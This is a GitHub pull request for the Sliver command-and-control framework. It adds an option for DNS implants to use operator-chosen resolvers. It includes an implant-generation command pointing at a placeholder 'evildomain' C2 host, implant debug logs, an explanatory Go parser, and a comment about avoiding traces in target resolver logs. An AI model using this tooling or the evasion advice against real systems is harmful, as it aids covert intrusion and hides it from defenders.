Adding support for specifying DNS resolvers through advanced options #1235

Merged: 1 commit merged into master from dns-specification on May 15, 2023

Conversation

RafBishopFox
Collaborator

Addresses #718. Added an option to the advanced C2 options, called resolvers, that lets the operator specify resolvers to use instead of those specified on the system. Using the new option would look something like this:

generate --dns my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9

Resolvers are separated with the plus symbol because we are using URL encoding. An example is below. I did not have a C2 server listening specifically to make sure it would failover to the second resolver.

2023/05/15 14:27:45 sliver.go:95: Hello my name is OFFICIAL_HIP
2023/05/15 14:27:45 limits.go:58: Limit checks completed
2023/05/15 14:27:45 sliver.go:113: Running in session mode
2023/05/15 14:27:45 session.go:64: Starting interactive session connection loop ...
2023/05/15 14:27:45 transports.go:41: Starting c2 url generator () ...
2023/05/15 14:27:45 transports.go:104: Return generator: (chan *url.URL)(0xc000046780)
2023/05/15 14:27:45 transports.go:92: Yield c2 uri = 'dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9'
2023/05/15 14:27:45 transports.go:92: Yield c2 uri = 'dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9'
2023/05/15 14:27:45 session.go:81: Next CC = dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9
2023/05/15 14:27:45 session.go:81: Next CC = dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9
2023/05/15 14:27:45 transports.go:92: Yield c2 uri = 'dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9'
2023/05/15 14:27:45 session.go:171: Attempting to connect via DNS via parent: my.evildomain.com.
2023/05/15 14:27:45 dnsclient.go:152: DNS client connecting to 'my.evildomain.com.' (timeout: 5s) ...
2023/05/15 14:27:45 dnsclient.go:746: [dns] forceResolvConf: ; forceResolvers: 1.1.1.1 9.9.9.9
2023/05/15 14:27:45 dnsclient.go:761: [dns] Using specified DNS resolvers: 1.1.1.1 9.9.9.9
2023/05/15 14:27:45 dnsclient.go:299: [dns] found resolvers: [1.1.1.1 9.9.9.9]
2023/05/15 14:27:45 crypto.go:199: TOTP Code: 96704390
2023/05/15 14:27:45 dnsclient.go:717: [dns] Fetching dns session id via 'baakbbnjkrqa.my.evildomain.com.' ...
2023/05/15 14:27:45 resolver-generic.go:92: [dns] 1.1.1.1:53->A record of baakbbnjkrqa.my.evildomain.com. ?
2023/05/15 14:27:47 resolver-generic.go:175: [dns] rtt->1.1.1.1:53 2.046869062s (err: <nil>)
2023/05/15 14:27:47 resolver-generic.go:100: [dns] error response status: 2
2023/05/15 14:27:47 resolver-generic.go:83: [dns] query error: invalid rcode (retry wait: 1s)
2023/05/15 14:27:48 resolver-generic.go:92: [dns] 1.1.1.1:53->A record of baakbbnjkrqa.my.evildomain.com. ?
2023/05/15 14:27:50 resolver-generic.go:175: [dns] rtt->1.1.1.1:53 2.019922597s (err: <nil>)
2023/05/15 14:27:50 resolver-generic.go:100: [dns] error response status: 2
2023/05/15 14:27:50 resolver-generic.go:83: [dns] query error: invalid rcode (retry wait: 1s)
2023/05/15 14:27:51 resolver-generic.go:92: [dns] 1.1.1.1:53->A record of baakbbnjkrqa.my.evildomain.com. ?
2023/05/15 14:27:53 resolver-generic.go:175: [dns] rtt->1.1.1.1:53 2.052029252s (err: <nil>)
2023/05/15 14:27:53 resolver-generic.go:100: [dns] error response status: 2
2023/05/15 14:27:53 resolver-generic.go:83: [dns] query error: invalid rcode (retry wait: 1s)
2023/05/15 14:27:54 resolver-generic.go:92: [dns] 9.9.9.9:53->A record of baakbbnjkrqa.my.evildomain.com. ?
2023/05/15 14:27:56 resolver-generic.go:175: [dns] rtt->9.9.9.9:53 1.51873538s (err: <nil>)
2023/05/15 14:27:56 resolver-generic.go:100: [dns] error response status: 2
2023/05/15 14:27:56 resolver-generic.go:83: [dns] query error: invalid rcode (retry wait: 1s)

If this PR is accepted, I will update the documentation in the Wiki. Hopefully this will make it easier to specify resolvers rather than URL-encoding a resolv.conf file. 😊

@RafBishopFox RafBishopFox requested a review from a team as a code owner May 15, 2023 19:23
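The point about the plus sign above is a property of URL query encoding: a `+` in a query string decodes to a space, which is why the implant log shows `forceResolvers: 1.1.1.1 9.9.9.9` as a space-separated list. The snippet below is an added illustration of that decoding and of the validation a parser for such a parameter should do; it is not Sliver's own dnsclient.go code. The function name `ParseResolvers`, the default port of 53, the requirement that each entry be an IP literal, and the example hostnames and the IPv6 documentation address `2001:db8::53` are all assumptions made here.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
	"strconv"
	"strings"
)

// ParseResolvers extracts the resolvers listed in the query string of a
// dns:// C2 URL of the form dns://host.?resolvers=1.1.1.1+9.9.9.9 and
// returns them as host:port strings (hypothetical helper, not Sliver's own).
//
// '+' is the URL encoding of a space inside a query string, so
// url.Parse().Query().Get hands back "1.1.1.1 9.9.9.9"; the list is
// therefore split on whitespace, not on '+'. A bare IP gets port 53 by
// default (an assumption here); ip:port and [ip6]:port are also accepted.
// An empty or absent parameter yields nil, meaning "use system resolvers".
func ParseResolvers(rawURL string) ([]string, error) {
	u, err := url.Parse(rawURL)
	if err != nil {
		return nil, err
	}
	raw := u.Query().Get("resolvers")
	if strings.TrimSpace(raw) == "" {
		return nil, nil
	}
	var out []string
	for _, entry := range strings.Fields(raw) {
		hostPort, err := normalizeResolver(entry)
		if err != nil {
			return nil, fmt.Errorf("resolver %q: %w", entry, err)
		}
		out = append(out, hostPort)
	}
	return out, nil
}

// normalizeResolver validates one entry and returns it as host:port.
// Anything that is not an IP literal (a hostname, or a comma-joined
// list that was not split because ',' is not a separator) is rejected,
// so a mistyped option fails loudly instead of silently resolving nothing.
func normalizeResolver(entry string) (string, error) {
	host, port, err := net.SplitHostPort(entry)
	if err != nil {
		// SplitHostPort fails on a bare address: no port given, default to 53.
		host, port = entry, "53"
	}
	if net.ParseIP(host) == nil {
		return "", errors.New("not an IP address literal")
	}
	if p, err := strconv.Atoi(port); err != nil || p < 1 || p > 65535 {
		return "", errors.New("invalid port")
	}
	return net.JoinHostPort(host, port), nil
}

func main() {
	// Constructed sample URLs; the domain is a placeholder, not a real C2.
	for _, raw := range []string{
		"dns://example.invalid.?resolvers=1.1.1.1+9.9.9.9",
		"dns://example.invalid.?resolvers=1.1.1.1+[2001:db8::53]:5353",
		"dns://example.invalid.?resolvers=1.1.1.1,9.9.9.9", // wrong separator
		"dns://example.invalid.",                           // no override
	} {
		resolvers, err := ParseResolvers(raw)
		fmt.Printf("%s -> %v (err: %v)\n", raw, resolvers, err)
	}
}
```

The third sample shows the failure mode worth knowing about: a comma-separated list is not decoded into two entries, so it must be rejected rather than passed to the DNS client as one malformed address.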
@smeukinou
Contributor

tbh, having a specific resolver (or even dns over http) would be useful to all implants' network functions; that could avoid leaving traces in the "official" resolver logs if internet is available on the target.

@moloch--
Member

tbh, having a specific resolver (or even dns over http) would be useful to all implants' network functions; that could avoid leaving traces in the "official" resolver logs if internet is available on the target.

This will be a bit trickier to implement; we only include the DNS client code in the implant build if DNS C2 is enabled.

@moloch-- moloch-- merged commit 47f10d0 into master May 15, 2023
@RafBishopFox RafBishopFox deleted the dns-specification branch May 16, 2023 11:26